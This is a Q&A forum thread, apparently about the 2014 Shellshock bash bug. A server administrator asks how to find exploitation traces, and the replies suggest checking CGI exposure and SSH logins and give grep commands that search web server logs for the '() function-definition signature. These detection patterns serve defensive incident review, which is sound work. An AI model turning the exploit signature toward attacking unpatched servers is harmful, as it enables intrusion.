I've patched my servers, but I'd also like to review my logs to see if there have been any compromises on them. Are there any consistent traces of exploits using this bug?
Asked
Active
Viewed 618 times
2
-
perhaps, but there is no common signature, because it is an arbitrary code execution bug. the attacker can pack whatever malicious payload they like in the environment variables they are poisoning. Better question, do you run any CGI bin scripts? otherwise you mostly need to authenticate via SSH in order to exploit, so check your logs for unexpected ssh logins. – Frank Thomas Sep 25 '14 at 20:36
1 Answers
2
I caught some hits in the logs with:
grep -r '"()' /var/log/httpd/
grep -r "'()" /var/log/httpd/
Darren
- 186
- 1
- 5
-
1To note that the paths used might differ based on your actual server, e.g. *lighttpd* would use `/var/log/lighttpd/` instead. – Mario Sep 27 '14 at 07:37